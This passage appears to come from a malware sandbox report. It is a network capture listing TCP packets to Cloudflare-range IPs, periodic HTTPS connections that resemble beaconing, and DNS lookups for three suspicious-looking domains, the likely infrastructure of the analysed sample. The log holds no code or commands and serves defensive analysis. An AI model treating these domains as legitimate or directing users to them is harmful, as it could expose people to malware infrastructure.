                                Aug 27, 2024 09:49:43.709279060 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:43.709290028 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:43.709301949 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:43.709305048 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:43.709315062 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:43.709327936 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:43.709328890 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:43.709338903 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:43.709340096 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:43.709350109 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:43.709361076 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:43.709368944 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:43.709373951 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:43.709395885 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:43.709397078 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:43.709403992 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:43.709741116 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:43.709753036 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:43.709763050 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:43.709769011 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:43.709779978 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:43.709788084 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:43.709790945 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:43.709800959 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:43.709803104 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:43.709815025 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:43.709825993 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:43.709830999 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:43.709836960 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:43.709849119 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:43.709850073 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:43.709867001 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:43.709875107 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:43.709886074 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:43.709892035 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:43.709898949 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:43.709911108 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:43.709923029 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:43.709933043 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:43.709935904 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:43.709947109 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:43.709958076 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:43.709970951 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:43.710005999 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:43.710030079 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:43.710042000 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:43.710048914 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:43.710052013 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:43.710067987 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:43.710078955 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:43.710086107 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:43.710098028 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:43.710105896 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:43.710109949 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:43.710122108 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:43.710133076 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:43.710139990 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:43.710145950 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:43.710158110 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:43.710164070 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:43.710167885 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:43.710187912 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:43.710207939 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:43.710339069 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:43.710350037 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:43.710361004 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:43.710372925 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:43.710383892 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:43.710385084 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:43.710397005 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:43.710410118 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:43.710422039 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:43.710449934 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:43.710477114 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:43.710489035 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:43.710504055 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:43.710515976 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:43.710525036 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:43.710526943 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:43.710539103 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:43.710549116 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:43.710551977 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:43.710571051 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:43.710596085 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:44.038315058 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:44.038340092 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:44.038352966 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:44.038363934 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:44.038377047 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:44.038388014 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:44.038400888 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:44.038486004 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:44.038497925 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:44.038511038 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:44.038520098 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:44.038522959 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:44.038535118 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:44.038547039 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:44.038558960 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:44.038567066 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:44.038588047 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:44.038605928 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:44.038616896 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:44.038629055 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:44.038640976 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:44.038652897 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:44.038667917 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:44.038690090 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:44.038762093 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:44.038774014 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:44.038784981 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:44.038795948 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:44.038813114 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:44.038814068 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:44.038824081 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:44.038834095 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:44.038841009 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:44.038846970 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:44.038858891 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:44.038861036 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:44.038876057 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:44.038883924 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:44.038887978 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:44.038901091 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:44.038913965 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:44.038922071 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:44.038927078 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:44.038942099 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:44.038969994 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:44.039051056 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:44.039062023 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:44.039079905 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:44.039088964 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:44.039098024 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:44.039104939 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:44.039391994 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:44.039391994 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:50:01.368804932 CEST49716443192.168.2.8104.21.17.45
                                Aug 27, 2024 09:50:01.368853092 CEST44349716104.21.17.45192.168.2.8
                                Aug 27, 2024 09:50:01.368918896 CEST49716443192.168.2.8104.21.17.45
                                Aug 27, 2024 09:50:01.398051023 CEST49716443192.168.2.8104.21.17.45
                                Aug 27, 2024 09:50:01.398083925 CEST44349716104.21.17.45192.168.2.8
                                Aug 27, 2024 09:50:01.688232899 CEST4971480192.168.2.8188.114.96.3
                                Aug 27, 2024 09:50:01.688370943 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:50:01.887974977 CEST44349716104.21.17.45192.168.2.8
                                Aug 27, 2024 09:50:01.888092041 CEST49716443192.168.2.8104.21.17.45
                                Aug 27, 2024 09:50:01.893033028 CEST49716443192.168.2.8104.21.17.45
                                Aug 27, 2024 09:50:01.893043041 CEST44349716104.21.17.45192.168.2.8
                                Aug 27, 2024 09:50:01.893275023 CEST44349716104.21.17.45192.168.2.8
                                Aug 27, 2024 09:50:01.945527077 CEST49716443192.168.2.8104.21.17.45
                                Aug 27, 2024 09:50:02.261841059 CEST49716443192.168.2.8104.21.17.45
                                Aug 27, 2024 09:50:02.261888981 CEST49716443192.168.2.8104.21.17.45
                                Aug 27, 2024 09:50:02.261997938 CEST44349716104.21.17.45192.168.2.8
                                Aug 27, 2024 09:50:02.915967941 CEST44349716104.21.17.45192.168.2.8
                                Aug 27, 2024 09:50:02.916064024 CEST44349716104.21.17.45192.168.2.8
                                Aug 27, 2024 09:50:02.916125059 CEST49716443192.168.2.8104.21.17.45
                                Aug 27, 2024 09:50:02.917200089 CEST49716443192.168.2.8104.21.17.45
                                Aug 27, 2024 09:50:02.917217970 CEST44349716104.21.17.45192.168.2.8
                                Aug 27, 2024 09:50:02.917231083 CEST49716443192.168.2.8104.21.17.45
                                Aug 27, 2024 09:50:02.917237997 CEST44349716104.21.17.45192.168.2.8
                                Aug 27, 2024 09:50:03.012399912 CEST49717443192.168.2.8104.26.7.127
                                Aug 27, 2024 09:50:03.012442112 CEST44349717104.26.7.127192.168.2.8
                                Aug 27, 2024 09:50:03.012528896 CEST49717443192.168.2.8104.26.7.127
                                Aug 27, 2024 09:50:03.012842894 CEST49717443192.168.2.8104.26.7.127
                                Aug 27, 2024 09:50:03.012856007 CEST44349717104.26.7.127192.168.2.8
                                Aug 27, 2024 09:50:03.766983032 CEST44349717104.26.7.127192.168.2.8
                                Aug 27, 2024 09:50:03.767101049 CEST49717443192.168.2.8104.26.7.127
                                Aug 27, 2024 09:50:03.768779993 CEST49717443192.168.2.8104.26.7.127
                                Aug 27, 2024 09:50:03.768784046 CEST44349717104.26.7.127192.168.2.8
                                Aug 27, 2024 09:50:03.768985987 CEST44349717104.26.7.127192.168.2.8
                                Aug 27, 2024 09:50:03.770278931 CEST49717443192.168.2.8104.26.7.127
                                Aug 27, 2024 09:50:03.770312071 CEST49717443192.168.2.8104.26.7.127
                                Aug 27, 2024 09:50:03.770317078 CEST44349717104.26.7.127192.168.2.8
                                Aug 27, 2024 09:50:04.491734982 CEST44349717104.26.7.127192.168.2.8
                                Aug 27, 2024 09:50:04.491822004 CEST44349717104.26.7.127192.168.2.8
                                Aug 27, 2024 09:50:04.491893053 CEST49717443192.168.2.8104.26.7.127
                                Aug 27, 2024 09:50:04.502073050 CEST49717443192.168.2.8104.26.7.127
                                Aug 27, 2024 09:50:04.502080917 CEST44349717104.26.7.127192.168.2.8
                                Aug 27, 2024 09:50:04.624492884 CEST49718443192.168.2.8104.26.7.127
                                Aug 27, 2024 09:50:04.624522924 CEST44349718104.26.7.127192.168.2.8
                                Aug 27, 2024 09:50:04.624603987 CEST49718443192.168.2.8104.26.7.127
                                Aug 27, 2024 09:50:04.628235102 CEST49718443192.168.2.8104.26.7.127
                                Aug 27, 2024 09:50:04.628246069 CEST44349718104.26.7.127192.168.2.8
                                Aug 27, 2024 09:50:05.083888054 CEST44349718104.26.7.127192.168.2.8
                                Aug 27, 2024 09:50:05.084022999 CEST49718443192.168.2.8104.26.7.127
                                Aug 27, 2024 09:50:05.085443974 CEST49718443192.168.2.8104.26.7.127
                                Aug 27, 2024 09:50:05.085453033 CEST44349718104.26.7.127192.168.2.8
                                Aug 27, 2024 09:50:05.085664988 CEST44349718104.26.7.127192.168.2.8
                                Aug 27, 2024 09:50:05.087040901 CEST49718443192.168.2.8104.26.7.127
                                Aug 27, 2024 09:50:05.087064981 CEST49718443192.168.2.8104.26.7.127
                                Aug 27, 2024 09:50:05.087101936 CEST44349718104.26.7.127192.168.2.8
                                Aug 27, 2024 09:50:05.751316071 CEST44349718104.26.7.127192.168.2.8
                                Aug 27, 2024 09:50:05.751411915 CEST44349718104.26.7.127192.168.2.8
                                Aug 27, 2024 09:50:05.751466036 CEST49718443192.168.2.8104.26.7.127
                                Aug 27, 2024 09:50:05.751684904 CEST49718443192.168.2.8104.26.7.127
                                Aug 27, 2024 09:50:05.751707077 CEST44349718104.26.7.127192.168.2.8
                                Aug 27, 2024 09:50:05.751718998 CEST49718443192.168.2.8104.26.7.127
                                Aug 27, 2024 09:50:05.751724958 CEST44349718104.26.7.127192.168.2.8
                                Aug 27, 2024 09:50:13.777921915 CEST49719443192.168.2.8104.26.7.127
                                Aug 27, 2024 09:50:13.777954102 CEST44349719104.26.7.127192.168.2.8
                                Aug 27, 2024 09:50:13.778033972 CEST49719443192.168.2.8104.26.7.127
                                Aug 27, 2024 09:50:13.778484106 CEST49719443192.168.2.8104.26.7.127
                                Aug 27, 2024 09:50:13.778496027 CEST44349719104.26.7.127192.168.2.8
                                Aug 27, 2024 09:50:14.423841953 CEST44349719104.26.7.127192.168.2.8
                                Aug 27, 2024 09:50:14.423922062 CEST49719443192.168.2.8104.26.7.127
                                Aug 27, 2024 09:50:14.432509899 CEST49719443192.168.2.8104.26.7.127
                                Aug 27, 2024 09:50:14.432526112 CEST44349719104.26.7.127192.168.2.8
                                Aug 27, 2024 09:50:14.432755947 CEST44349719104.26.7.127192.168.2.8
                                Aug 27, 2024 09:50:14.436005116 CEST49719443192.168.2.8104.26.7.127
                                Aug 27, 2024 09:50:14.436005116 CEST49719443192.168.2.8104.26.7.127
                                Aug 27, 2024 09:50:14.436108112 CEST44349719104.26.7.127192.168.2.8
                                Aug 27, 2024 09:50:15.108997107 CEST44349719104.26.7.127192.168.2.8
                                Aug 27, 2024 09:50:15.109082937 CEST44349719104.26.7.127192.168.2.8
                                Aug 27, 2024 09:50:15.109133959 CEST49719443192.168.2.8104.26.7.127
                                Aug 27, 2024 09:50:15.109477043 CEST49719443192.168.2.8104.26.7.127
                                Aug 27, 2024 09:50:15.109498978 CEST44349719104.26.7.127192.168.2.8
                                Aug 27, 2024 09:50:15.109513044 CEST49719443192.168.2.8104.26.7.127
                                Aug 27, 2024 09:50:15.109518051 CEST44349719104.26.7.127192.168.2.8
                                Aug 27, 2024 09:50:23.141159058 CEST49720443192.168.2.8104.26.7.127
                                Aug 27, 2024 09:50:23.141220093 CEST44349720104.26.7.127192.168.2.8
                                Aug 27, 2024 09:50:23.141290903 CEST49720443192.168.2.8104.26.7.127
                                Aug 27, 2024 09:50:23.141705990 CEST49720443192.168.2.8104.26.7.127
                                Aug 27, 2024 09:50:23.141720057 CEST44349720104.26.7.127192.168.2.8
                                Aug 27, 2024 09:50:23.626648903 CEST44349720104.26.7.127192.168.2.8
                                Aug 27, 2024 09:50:23.626753092 CEST49720443192.168.2.8104.26.7.127
                                Aug 27, 2024 09:50:23.628240108 CEST49720443192.168.2.8104.26.7.127
                                Aug 27, 2024 09:50:23.628252029 CEST44349720104.26.7.127192.168.2.8
                                Aug 27, 2024 09:50:23.628530025 CEST44349720104.26.7.127192.168.2.8
                                Aug 27, 2024 09:50:23.629959106 CEST49720443192.168.2.8104.26.7.127
                                Aug 27, 2024 09:50:23.629982948 CEST49720443192.168.2.8104.26.7.127
                                Aug 27, 2024 09:50:23.630024910 CEST44349720104.26.7.127192.168.2.8
                                Aug 27, 2024 09:50:24.299557924 CEST44349720104.26.7.127192.168.2.8
                                Aug 27, 2024 09:50:24.299650908 CEST44349720104.26.7.127192.168.2.8
                                Aug 27, 2024 09:50:24.299717903 CEST49720443192.168.2.8104.26.7.127
                                Aug 27, 2024 09:50:24.300004959 CEST49720443192.168.2.8104.26.7.127
                                Aug 27, 2024 09:50:24.300004959 CEST49720443192.168.2.8104.26.7.127
                                Aug 27, 2024 09:50:24.300024986 CEST44349720104.26.7.127192.168.2.8
                                Aug 27, 2024 09:50:24.300035954 CEST44349720104.26.7.127192.168.2.8
                                Aug 27, 2024 09:50:31.310252905 CEST49721443192.168.2.8104.26.7.127
                                Aug 27, 2024 09:50:31.310307026 CEST44349721104.26.7.127192.168.2.8
                                Aug 27, 2024 09:50:31.310388088 CEST49721443192.168.2.8104.26.7.127
                                Aug 27, 2024 09:50:31.310734034 CEST49721443192.168.2.8104.26.7.127
                                Aug 27, 2024 09:50:31.310745955 CEST44349721104.26.7.127192.168.2.8
                                Aug 27, 2024 09:50:31.787647963 CEST44349721104.26.7.127192.168.2.8
                                Aug 27, 2024 09:50:31.787827015 CEST49721443192.168.2.8104.26.7.127
                                Aug 27, 2024 09:50:31.789190054 CEST49721443192.168.2.8104.26.7.127
                                Aug 27, 2024 09:50:31.789201021 CEST44349721104.26.7.127192.168.2.8
                                Aug 27, 2024 09:50:31.789427996 CEST44349721104.26.7.127192.168.2.8
                                Aug 27, 2024 09:50:31.791023970 CEST49721443192.168.2.8104.26.7.127
                                Aug 27, 2024 09:50:31.791047096 CEST49721443192.168.2.8104.26.7.127
                                Aug 27, 2024 09:50:31.791090965 CEST44349721104.26.7.127192.168.2.8
                                Aug 27, 2024 09:50:32.442661047 CEST44349721104.26.7.127192.168.2.8
                                Aug 27, 2024 09:50:32.442759991 CEST44349721104.26.7.127192.168.2.8
                                Aug 27, 2024 09:50:32.442807913 CEST49721443192.168.2.8104.26.7.127
                                Aug 27, 2024 09:50:32.442970037 CEST49721443192.168.2.8104.26.7.127
                                Aug 27, 2024 09:50:32.442995071 CEST44349721104.26.7.127192.168.2.8
                                Aug 27, 2024 09:50:32.443010092 CEST49721443192.168.2.8104.26.7.127
                                Aug 27, 2024 09:50:32.443017960 CEST44349721104.26.7.127192.168.2.8
                                Aug 27, 2024 09:50:37.450582027 CEST49722443192.168.2.8104.26.7.127
                                Aug 27, 2024 09:50:37.450661898 CEST44349722104.26.7.127192.168.2.8
                                Aug 27, 2024 09:50:37.450747967 CEST49722443192.168.2.8104.26.7.127
                                Aug 27, 2024 09:50:37.451095104 CEST49722443192.168.2.8104.26.7.127
                                Aug 27, 2024 09:50:37.451112032 CEST44349722104.26.7.127192.168.2.8
                                Aug 27, 2024 09:50:37.926717043 CEST44349722104.26.7.127192.168.2.8
                                Aug 27, 2024 09:50:37.926862955 CEST49722443192.168.2.8104.26.7.127
                                Aug 27, 2024 09:50:37.928589106 CEST49722443192.168.2.8104.26.7.127
                                Aug 27, 2024 09:50:37.928599119 CEST44349722104.26.7.127192.168.2.8
                                Aug 27, 2024 09:50:37.929212093 CEST44349722104.26.7.127192.168.2.8
                                Aug 27, 2024 09:50:37.930505991 CEST49722443192.168.2.8104.26.7.127
                                Aug 27, 2024 09:50:37.930521011 CEST49722443192.168.2.8104.26.7.127
                                Aug 27, 2024 09:50:37.930560112 CEST44349722104.26.7.127192.168.2.8
                                Aug 27, 2024 09:50:38.600064039 CEST44349722104.26.7.127192.168.2.8
                                Aug 27, 2024 09:50:38.600143909 CEST44349722104.26.7.127192.168.2.8
                                Aug 27, 2024 09:50:38.600296021 CEST49722443192.168.2.8104.26.7.127
                                Aug 27, 2024 09:50:38.600394964 CEST49722443192.168.2.8104.26.7.127
                                Aug 27, 2024 09:50:38.600410938 CEST44349722104.26.7.127192.168.2.8
                                Aug 27, 2024 09:50:38.600421906 CEST49722443192.168.2.8104.26.7.127
                                Aug 27, 2024 09:50:38.600426912 CEST44349722104.26.7.127192.168.2.8
                                Aug 27, 2024 09:50:45.606036901 CEST49723443192.168.2.8104.26.7.127
                                Aug 27, 2024 09:50:45.606100082 CEST44349723104.26.7.127192.168.2.8
                                Aug 27, 2024 09:50:45.606201887 CEST49723443192.168.2.8104.26.7.127
                                Aug 27, 2024 09:50:45.606575012 CEST49723443192.168.2.8104.26.7.127
                                Aug 27, 2024 09:50:45.606587887 CEST44349723104.26.7.127192.168.2.8
                                Aug 27, 2024 09:50:46.096986055 CEST44349723104.26.7.127192.168.2.8
                                Aug 27, 2024 09:50:46.097075939 CEST49723443192.168.2.8104.26.7.127
                                Aug 27, 2024 09:50:46.098412991 CEST49723443192.168.2.8104.26.7.127
                                Aug 27, 2024 09:50:46.098427057 CEST44349723104.26.7.127192.168.2.8
                                Aug 27, 2024 09:50:46.098645926 CEST44349723104.26.7.127192.168.2.8
                                Aug 27, 2024 09:50:46.100089073 CEST49723443192.168.2.8104.26.7.127
                                Aug 27, 2024 09:50:46.100121021 CEST49723443192.168.2.8104.26.7.127
                                Aug 27, 2024 09:50:46.100138903 CEST44349723104.26.7.127192.168.2.8
                                Aug 27, 2024 09:50:46.758476973 CEST44349723104.26.7.127192.168.2.8
                                Aug 27, 2024 09:50:46.758733034 CEST44349723104.26.7.127192.168.2.8
                                Aug 27, 2024 09:50:46.758826017 CEST49723443192.168.2.8104.26.7.127
                                Aug 27, 2024 09:50:46.759023905 CEST49723443192.168.2.8104.26.7.127
                                Aug 27, 2024 09:50:46.759043932 CEST44349723104.26.7.127192.168.2.8
                                Aug 27, 2024 09:50:51.777319908 CEST49724443192.168.2.8104.26.7.127
                                Aug 27, 2024 09:50:51.777374983 CEST44349724104.26.7.127192.168.2.8
                                Aug 27, 2024 09:50:51.777467966 CEST49724443192.168.2.8104.26.7.127
                                Aug 27, 2024 09:50:51.777779102 CEST49724443192.168.2.8104.26.7.127
                                Aug 27, 2024 09:50:51.777792931 CEST44349724104.26.7.127192.168.2.8
                                Aug 27, 2024 09:50:52.252991915 CEST44349724104.26.7.127192.168.2.8
                                Aug 27, 2024 09:50:52.253082037 CEST49724443192.168.2.8104.26.7.127
                                Aug 27, 2024 09:50:52.254412889 CEST49724443192.168.2.8104.26.7.127
                                Aug 27, 2024 09:50:52.254422903 CEST44349724104.26.7.127192.168.2.8
                                Aug 27, 2024 09:50:52.254652977 CEST44349724104.26.7.127192.168.2.8
                                Aug 27, 2024 09:50:52.255774975 CEST49724443192.168.2.8104.26.7.127
                                Aug 27, 2024 09:50:52.255805969 CEST49724443192.168.2.8104.26.7.127
                                Aug 27, 2024 09:50:52.255837917 CEST44349724104.26.7.127192.168.2.8
                                Aug 27, 2024 09:50:53.076371908 CEST44349724104.26.7.127192.168.2.8
                                Aug 27, 2024 09:50:53.076471090 CEST44349724104.26.7.127192.168.2.8
                                Aug 27, 2024 09:50:53.076643944 CEST49724443192.168.2.8104.26.7.127
                                Aug 27, 2024 09:50:53.076735973 CEST49724443192.168.2.8104.26.7.127
                                Aug 27, 2024 09:50:53.076755047 CEST44349724104.26.7.127192.168.2.8
                                Aug 27, 2024 09:50:53.076770067 CEST49724443192.168.2.8104.26.7.127
                                Aug 27, 2024 09:50:53.076776028 CEST44349724104.26.7.127192.168.2.8
                                Aug 27, 2024 09:50:59.091994047 CEST49725443192.168.2.8104.26.7.127
                                Aug 27, 2024 09:50:59.092046976 CEST44349725104.26.7.127192.168.2.8
                                Aug 27, 2024 09:50:59.092138052 CEST49725443192.168.2.8104.26.7.127
                                Aug 27, 2024 09:50:59.092525005 CEST49725443192.168.2.8104.26.7.127
                                Aug 27, 2024 09:50:59.092540026 CEST44349725104.26.7.127192.168.2.8
                                Aug 27, 2024 09:50:59.578304052 CEST44349725104.26.7.127192.168.2.8
                                Aug 27, 2024 09:50:59.578619957 CEST49725443192.168.2.8104.26.7.127
                                Aug 27, 2024 09:50:59.579991102 CEST49725443192.168.2.8104.26.7.127
                                Aug 27, 2024 09:50:59.580003977 CEST44349725104.26.7.127192.168.2.8
                                Aug 27, 2024 09:50:59.580235004 CEST44349725104.26.7.127192.168.2.8
                                Aug 27, 2024 09:50:59.581567049 CEST49725443192.168.2.8104.26.7.127
                                Aug 27, 2024 09:50:59.581593990 CEST49725443192.168.2.8104.26.7.127
                                Aug 27, 2024 09:50:59.581640005 CEST44349725104.26.7.127192.168.2.8
                                Aug 27, 2024 09:51:00.260910988 CEST44349725104.26.7.127192.168.2.8
                                Aug 27, 2024 09:51:00.261009932 CEST44349725104.26.7.127192.168.2.8
                                Aug 27, 2024 09:51:00.261080980 CEST49725443192.168.2.8104.26.7.127
                                Aug 27, 2024 09:51:00.261281013 CEST49725443192.168.2.8104.26.7.127
                                Aug 27, 2024 09:51:00.261300087 CEST44349725104.26.7.127192.168.2.8
                                Aug 27, 2024 09:51:00.261312962 CEST49725443192.168.2.8104.26.7.127
                                Aug 27, 2024 09:51:00.261317968 CEST44349725104.26.7.127192.168.2.8
                                TimestampSource PortDest PortSource IPDest IP
                                Aug 27, 2024 09:49:33.916490078 CEST6023353192.168.2.81.1.1.1
                                Aug 27, 2024 09:49:33.929445028 CEST53602331.1.1.1192.168.2.8
                                Aug 27, 2024 09:50:01.344650984 CEST6223853192.168.2.81.1.1.1
                                Aug 27, 2024 09:50:01.359682083 CEST53622381.1.1.1192.168.2.8
                                Aug 27, 2024 09:50:02.997725964 CEST5671253192.168.2.81.1.1.1
                                Aug 27, 2024 09:50:03.011744022 CEST53567121.1.1.1192.168.2.8
                                TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                Aug 27, 2024 09:49:33.916490078 CEST192.168.2.81.1.1.10xa9baStandard query (0)web.ad87h92j.comA (IP address)IN (0x0001)false
                                Aug 27, 2024 09:50:01.344650984 CEST192.168.2.81.1.1.10x2d66Standard query (0)cacer.goldenh0ur.comA (IP address)IN (0x0001)false
                                Aug 27, 2024 09:50:02.997725964 CEST192.168.2.81.1.1.10xb2f8Standard query (0)mvc.withoutyou5.comA (IP address)IN (0x0001)false
